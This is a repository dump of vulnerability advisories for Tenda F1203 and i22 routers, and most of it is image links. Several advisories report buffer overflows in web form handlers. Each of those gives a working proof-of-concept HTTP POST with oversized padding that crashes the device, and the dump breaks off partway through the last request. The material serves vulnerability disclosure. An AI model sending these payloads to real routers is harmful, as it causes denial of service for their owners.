-------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/fromAddressNat_page/images/02.png -------------------------------------------------------------------------------- /tenda_f1203/fromAddressNat_page/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/fromAddressNat_page/images/03.png -------------------------------------------------------------------------------- /tenda_f1203/fromDhcpListClient/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/fromDhcpListClient/images/01.png -------------------------------------------------------------------------------- /tenda_f1203/fromDhcpListClient/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/fromDhcpListClient/images/02.png -------------------------------------------------------------------------------- /tenda_f1203/fromDhcpListClient/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/fromDhcpListClient/images/03.png -------------------------------------------------------------------------------- /tenda_f1203/fromNatStaticSetting/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/fromNatStaticSetting/images/01.png -------------------------------------------------------------------------------- /tenda_f1203/fromNatStaticSetting/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/fromNatStaticSetting/images/02.png -------------------------------------------------------------------------------- /tenda_f1203/fromNatStaticSetting/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/fromNatStaticSetting/images/03.png -------------------------------------------------------------------------------- /tenda_f1203/fromRouteStatic/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/fromRouteStatic/images/01.png -------------------------------------------------------------------------------- /tenda_f1203/fromRouteStatic/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/fromRouteStatic/images/02.png -------------------------------------------------------------------------------- /tenda_f1203/fromRouteStatic/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/fromRouteStatic/images/03.png -------------------------------------------------------------------------------- /tenda_f1203/fromVirtualSer/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/fromVirtualSer/images/01.png -------------------------------------------------------------------------------- /tenda_f1203/fromVirtualSer/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/fromVirtualSer/images/02.png -------------------------------------------------------------------------------- /tenda_f1203/fromVirtualSer/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/fromVirtualSer/images/03.png -------------------------------------------------------------------------------- /tenda_f1203/saveParentControlInfo_deviceId/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/saveParentControlInfo_deviceId/images/01.png -------------------------------------------------------------------------------- /tenda_f1203/saveParentControlInfo_deviceId/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/saveParentControlInfo_deviceId/images/02.png -------------------------------------------------------------------------------- /tenda_f1203/saveParentControlInfo_deviceId/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/saveParentControlInfo_deviceId/images/03.png -------------------------------------------------------------------------------- /tenda_f1203/saveParentControlInfo_deviceId/images/04.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/saveParentControlInfo_deviceId/images/04.png -------------------------------------------------------------------------------- /tenda_f1203/saveParentControlInfo_time/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/saveParentControlInfo_time/images/01.png -------------------------------------------------------------------------------- /tenda_f1203/saveParentControlInfo_time/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/saveParentControlInfo_time/images/02.png -------------------------------------------------------------------------------- /tenda_f1203/saveParentControlInfo_time/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/saveParentControlInfo_time/images/03.png -------------------------------------------------------------------------------- /tenda_f1203/saveParentControlInfo_time/images/04.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/saveParentControlInfo_time/images/04.png -------------------------------------------------------------------------------- /tenda_f1203/saveParentControlInfo_urls/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/saveParentControlInfo_urls/images/01.png -------------------------------------------------------------------------------- /tenda_f1203/saveParentControlInfo_urls/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/saveParentControlInfo_urls/images/02.png -------------------------------------------------------------------------------- /tenda_f1203/saveParentControlInfo_urls/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/saveParentControlInfo_urls/images/03.png -------------------------------------------------------------------------------- /tenda_f1203/saveParentControlInfo_urls/images/04.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_f1203/saveParentControlInfo_urls/images/04.png -------------------------------------------------------------------------------- /tenda_i22/firmware/US_i22V1.0BR_V1.0.0.3(4687)_CN_TDC01.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_i22/firmware/US_i22V1.0BR_V1.0.0.3(4687)_CN_TDC01.zip -------------------------------------------------------------------------------- /tenda_i22/formSetAppFilterRule/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_i22/formSetAppFilterRule/images/01.png -------------------------------------------------------------------------------- /tenda_i22/formSetAppFilterRule/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_i22/formSetAppFilterRule/images/02.png -------------------------------------------------------------------------------- /tenda_i22/formSetAppFilterRule/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_i22/formSetAppFilterRule/images/03.png -------------------------------------------------------------------------------- /tenda_i22/formSetAppFilterRule/images/04.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_i22/formSetAppFilterRule/images/04.png -------------------------------------------------------------------------------- /tenda_i22/formSetAutoPing_ping2/formSetAutoPing_ping2.md: -------------------------------------------------------------------------------- 1 | # Tenda i22 V1.0.0.3(4687) was discovered to contain a buffer overflow via the ping2 parameter in the formSetAutoPing function. 2 | 3 | ## Description 4 | 5 | `Tenda` Router **i22 V1.0.0.3(4687)** was discovered to contain a buffer overflow in the `httpd` module when handling `/goform/setAutoPing` request. 6 | 7 | ## Firmware information 8 | 9 | * Manufacturer's address: https://www.tenda.com.cn/ 10 | 11 | * Firmware download address : https://www.tenda.com.cn/download/detail-2747.html 12 | 13 | ## Affected version 14 | 15 | ![image-20221120101953226](images/01.png) 16 | 17 | ## Vulnerability details 18 | 19 | This vulnerability lies in the `/goform/setAutoPing` page,The details are shown below: 20 | 21 | ![image-20221120120736669](images/02.png) 22 | 23 | ## POC 24 | 25 | This POC can result in a Dos. 26 | 27 | ``` 28 | POST /goform/setAutoPing HTTP/1.1 29 | Host: 192.168.204.133 30 | Content-Length: 1146 31 | Cache-Control: max-age=0 32 | Upgrade-Insecure-Requests: 1 33 | Origin: http://192.168.204.133 34 | Content-Type: application/x-www-form-urlencoded 35 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 36 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 37 | Referer: http://192.168.204.133/system_hostname.asp?version=1487847846 38 | Accept-Encoding: gzip, deflate 39 | Accept-Language: zh-CN,zh;q=0.9 40 | Cookie: bLanguage=cn; password=jbl1qw; user= 41 | Connection: close 42 | 43 | linkEn=1&ping2=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 44 | ``` 45 | 46 | ![image-20221120121324270](images/03.png) -------------------------------------------------------------------------------- /tenda_i22/formSetAutoPing_ping2/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_i22/formSetAutoPing_ping2/images/01.png -------------------------------------------------------------------------------- /tenda_i22/formSetAutoPing_ping2/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_i22/formSetAutoPing_ping2/images/02.png -------------------------------------------------------------------------------- /tenda_i22/formSetAutoPing_ping2/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_i22/formSetAutoPing_ping2/images/03.png -------------------------------------------------------------------------------- /tenda_i22/formSetCfm/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_i22/formSetCfm/images/01.png -------------------------------------------------------------------------------- /tenda_i22/formSetCfm/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_i22/formSetCfm/images/02.png -------------------------------------------------------------------------------- /tenda_i22/formSetCfm/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_i22/formSetCfm/images/03.png -------------------------------------------------------------------------------- /tenda_i22/formSetCfm/images/04.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_i22/formSetCfm/images/04.png -------------------------------------------------------------------------------- /tenda_i22/formWifiMacFilterSet/formWifiMacFilterSet.md: -------------------------------------------------------------------------------- 1 | # Tenda i22 V1.0.0.3(4687) was discovered to contain a buffer overflow via the index parameter in the formWifiMacFilterSet function. 2 | 3 | ## Description 4 | 5 | `Tenda` Router **i22 V1.0.0.3(4687)** was discovered to contain a buffer overflow in the `httpd` module when handling `/goform/WifiMacFilterSet` request. 6 | 7 | ## Firmware information 8 | 9 | * Manufacturer's address: https://www.tenda.com.cn/ 10 | 11 | * Firmware download address : https://www.tenda.com.cn/download/detail-2747.html 12 | 13 | ## Affected version 14 | 15 | ![image-20221120101953226](images/01.png) 16 | 17 | ## Vulnerability details 18 | 19 | This vulnerability lies in the `/goform/WifiMacFilterSet` page,The details are shown below: 20 | 21 | ![image-20221120121943786](images/02.png) 22 | 23 | ## POC 24 | 25 | This POC can result in a Dos. 26 | 27 | ``` 28 | POST /goform/WifiMacFilterSet HTTP/1.1 29 | Host: 192.168.204.133 30 | Content-Length: 2068 31 | Cache-Control: max-age=0 32 | Upgrade-Insecure-Requests: 1 33 | Origin: http://192.168.204.133 34 | Content-Type: application/x-www-form-urlencoded 35 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 36 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 37 | Referer: http://192.168.204.133/system_hostname.asp 38 | Accept-Encoding: gzip, deflate 39 | Accept-Language: zh-CN,zh;q=0.9 40 | Cookie: bLanguage=cn; password=jbl1qw; user= 41 | Connection: close 42 | 43 | wl_radio=0&index=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 44 | ``` 45 | 46 | ![image-20221120113929418](images/03.png) -------------------------------------------------------------------------------- /tenda_i22/formWifiMacFilterSet/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_i22/formWifiMacFilterSet/images/01.png -------------------------------------------------------------------------------- /tenda_i22/formWifiMacFilterSet/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_i22/formWifiMacFilterSet/images/02.png -------------------------------------------------------------------------------- /tenda_i22/formWifiMacFilterSet/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_i22/formWifiMacFilterSet/images/03.png -------------------------------------------------------------------------------- /tenda_i22/formWx3AuthorizeSet/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_i22/formWx3AuthorizeSet/images/01.png -------------------------------------------------------------------------------- /tenda_i22/formWx3AuthorizeSet/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_i22/formWx3AuthorizeSet/images/02.png -------------------------------------------------------------------------------- /tenda_i22/formWx3AuthorizeSet/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_i22/formWx3AuthorizeSet/images/03.png -------------------------------------------------------------------------------- /tenda_i22/formwrlSSIDget/formWifiMacFilterGet.md: -------------------------------------------------------------------------------- 1 | # Tenda i22 V1.0.0.3(4687) was discovered to contain a buffer overflow via the list parameter in the formwrlSSIDget function. 2 | 3 | ## Description 4 | 5 | `Tenda` Router **i22 V1.0.0.3(4687)** was discovered to contain a buffer overflow in the `httpd` module when handling `/goform/wifiSSIDget` request. 6 | 7 | ## Firmware information 8 | 9 | * Manufacturer's address: https://www.tenda.com.cn/ 10 | 11 | * Firmware download address : https://www.tenda.com.cn/download/detail-2747.html 12 | 13 | ## Affected version 14 | 15 | ![image-20221120101953226](images/01.png) 16 | 17 | ## Vulnerability details 18 | 19 | This vulnerability lies in the `/goform/wifiSSIDget` page,The details are shown below: 20 | 21 | ![image-20221120115629192](images/02.png) 22 | 23 | ## POC 24 | 25 | This POC can result in a Dos. 26 | 27 | ``` 28 | POST /goform/wifiSSIDget HTTP/1.1 29 | Host: 192.168.204.133 30 | Content-Length: 2068 31 | Cache-Control: max-age=0 32 | Upgrade-Insecure-Requests: 1 33 | Origin: http://192.168.204.133 34 | Content-Type: application/x-www-form-urlencoded 35 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 36 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 37 | Referer: http://192.168.204.133/system_hostname.asp?version=1487847846 38 | Accept-Encoding: gzip, deflate 39 | Accept-Language: zh-CN,zh;q=0.9 40 | Cookie: bLanguage=cn; password=jbl1qw; user= 41 | Connection: close 42 | 43 | wl_radio=0&index=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 44 | ``` 45 | 46 | ![image-20221120113929418](images/03.png) -------------------------------------------------------------------------------- /tenda_i22/formwrlSSIDget/images/01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_i22/formwrlSSIDget/images/01.png -------------------------------------------------------------------------------- /tenda_i22/formwrlSSIDget/images/02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_i22/formwrlSSIDget/images/02.png -------------------------------------------------------------------------------- /tenda_i22/formwrlSSIDget/images/03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Double-q1015/CVE-vulns/d26cda5752a3da611eb0375468b332b381ab8866/tenda_i22/formwrlSSIDget/images/03.png -------------------------------------------------------------------------------- /tenda_i22/formwrlSSIDset/formwrlSSIDset.md: -------------------------------------------------------------------------------- 1 | # Tenda i22 V1.0.0.3(4687) was discovered to contain a buffer overflow via the list parameter in the formwrlSSIDset function. 2 | 3 | ## Description 4 | 5 | `Tenda` Router **i22 V1.0.0.3(4687)** was discovered to contain a buffer overflow in the `httpd` module when handling `/goform/wifiSSIDset` request. 6 | 7 | ## Firmware information 8 | 9 | * Manufacturer's address: https://www.tenda.com.cn/ 10 | 11 | * Firmware download address : https://www.tenda.com.cn/download/detail-2747.html 12 | 13 | ## Affected version 14 | 15 | ![image-20221120101953226](images/01.png) 16 | 17 | ## Vulnerability details 18 | 19 | This vulnerability lies in the `/goform/wifiSSIDset` page,The details are shown below: 20 | 21 | ![image-20221120152918198](images/02.png) 22 | 23 | ## POC 24 | 25 | This POC can result in a Dos. 26 | 27 | ``` 28 | POST /goform/wifiSSIDset HTTP/1.1 29 | Host: 192.168.204.133 30 | Content-Length: 2068 31 | Cache-Control: max-age=0 32 | Upgrade-Insecure-Requests: 1 33 | Origin: http://192.168.204.133 34 | Content-Type: application/x-www-form-urlencoded 35 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 36 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 37 | Referer: http://192.168.204.133/system_hostname.asp?version=1487847846 38 | Accept-Encoding: gzip, deflate 39 | 